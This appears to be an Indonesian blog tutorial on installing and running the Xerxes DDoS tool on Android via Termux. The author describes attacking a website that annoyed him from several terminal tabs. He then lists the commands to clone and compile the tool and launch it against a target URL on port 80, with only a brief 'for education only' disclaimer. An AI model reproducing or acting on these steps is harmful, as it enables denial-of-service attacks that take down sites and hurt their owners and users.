Cara Install Xerxes di Termux Android

Cara Install Xerxes di Termux Android - xerxes merupakan tool untuk ddos yang di tulis dari bahasa  C , dan menurut saya xerxes powerful dibandingkan dengan ddos tool yang lainnya. Saya mempunyai pengalaman lucu saat menggunakan tool yang satu ini, ceritanya ketika saya ingin testing seberapa hebat sih tool ini, dan saya mencoba untuk menyerang sebuah situs yang memang membuat saya jengkel. Saat proses DDoS berlangsung, pada saat itu saya menggunakan satu tab di termux untuk menyerang target, merasa tidak puas saya menambah satu tab lagi untuk menjalankan xerxes dan menyerang si target, jadi disini saya menyerang secara multiple atau lebih dari satu serangan.

Beberapa menit kemudian saya coba untuk cek si target sudah down atau belum, dan ternyata hasilnya nihil, seperti yang anda ketahui bahwa serangan ddos harus dilakukan lebih dari satu orang untuk mempercepat si target jadi down, akhirnya saya memutuskan untuk menambah satu tab lagi untuk menyerang si target. Beberapa menit kemudian android saya berjalan dengan lambat alias ngelag gan. Jadi kesimpulannya, jika anda ingin menjalankan xerxes lebih dari satu tab pikir pikir dulu, anda harus memiliki memory RAM cukup agar tidak ngelag. Oke daripada banyak ngomong mungkin sepertinya kita langsung saja untuk tutorial install xerxes di termux.

Cara Install Xerxes di Termux Android

Cara Install Xerxes di Termux Android


Step by Step Install Xerxes di Termux Android 


Pertama anda lakukan update dan upgrade termux anda.
$ apt update && apt upgrade -y
Setelah itu anda install beberapa package yang dibutuhkan (git, clang)
$ apt install git
$ apt install clang
Next kita clone repo xerxes di github.
$ git clone https://github.com/zanyarjamal/xerxes
Masuk ke direktori xerxes
$ cd xerxes
Setelah itu kita lakukan compile ke file xerxes.c
$ gcc xerxes.c -o xerxes
Nanti akan ada file baru yang bernama xerxes, itu output file hasil compile file xerxes.c
Terakhir kita jalankan file xerxes untuk mulai melakukan DDoS, saya akan berikan contoh syntaxnya.
$ ./xerxes <target> 80

di situ <target> anda ganti dengan alamat url situsnya.

Oke mungkin itu saja untuk kali ini, saya berharap ini hanya untuk edukasi saja, jika ada yang ingin ditanyakan silahkan bertanya melalui kolom komentar yang sudah tersedia dibawah. Dan jangan lupa untuk terus mengunjungi blog ini karena akan ada update tutorial unik lainnya.

Tutorial Termux Lainnya :

Comments